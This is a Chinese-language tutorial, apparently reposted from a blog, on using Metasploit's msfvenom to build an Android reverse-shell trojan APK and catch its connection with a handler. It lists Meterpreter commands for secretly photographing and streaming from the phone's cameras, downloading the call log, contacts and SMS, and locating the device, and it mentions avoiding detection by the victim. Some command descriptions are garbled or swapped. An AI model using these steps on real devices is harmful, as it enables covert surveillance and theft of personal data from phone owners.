Metasploit之渗透安卓实战
Metasploit之滲透安卓實戰
在之前的Metaspoloit使用中都是在Windows系統中,因為滲透的是Windows系統,所以選用了“windows/meterpreter/reverse_tcp”模塊。
而這里需要滲透安卓系統了,就選用“android/meterpreter/reverse_tcp”模塊。
那么對于kali-linux連接木馬的方式還是和之前的一樣,利用“exploit/multi/handler”
并且,同樣需要選用“windows/meterpreter/reverse_tcp”的PAYLOAD
這里假設我的測試環境
kali-linux: 192.168.2.146
安卓模擬環境:192.168.2.107
?
一、生成遠程安卓木馬
msfconsole
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=4444 R > payload.apk
命令解析:
p 設置要使用的payload
LHOST 設置用來接收反彈連接的主機(kali-linux的IP)
LPORT 設置用來接收反彈連接的端口(kali-linux的端口)
R 設置文件格式
Location 要保存的文件位置-->/root/Desktop/是桌面,沒有目錄表示當前系統Home目錄下
PS:對于目前的安卓系統安全機制的考慮,因為沒有簽名證書可能導致無法安裝或易被受害者識破
那么,簽名證書的制作可以查看參考文獻資料
?
二、開啟metasploit,并且開啟相關連接
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.2.146
set LPORT 4444
exploit
?
三、meterpreter連接
安卓手機安裝并且打開木馬后會返回我們一個meterpreter連接,那么我們可以使用以下的一些常用的命令:
cd -->目錄切換,命令:cd / 切換到根目錄
search -->搜索文件,命令:search text.jpg
download -->下載文件,命令:download test.jpg
webcam_list -->查看攝像頭列表,因為手機都是前置和后置攝像頭了
webcam_snap -->拍照一張,需要選用前置或者后置攝像頭,命令:webcam_snap -i 1
webcam_stream -->開啟攝像頭視頻監控,同上,命令:webcam_stream -i 1
安卓系統相關命令:
check_root -->查看當前安卓是否已經root
dump_calllog -->下載通話記錄
dump_contacts -->下載短信記錄
dump_sms -->下載通訊錄
geolocate -->利用谷歌地圖定位(需要安裝谷歌地圖)
?
轉載于:https://www.cnblogs.com/Alvin-blog/p/9977879.html
總結
以上是生活随笔為你收集整理的Metasploit之渗透安卓实战的全部內容,希望文章能夠幫你解決所遇到的問題。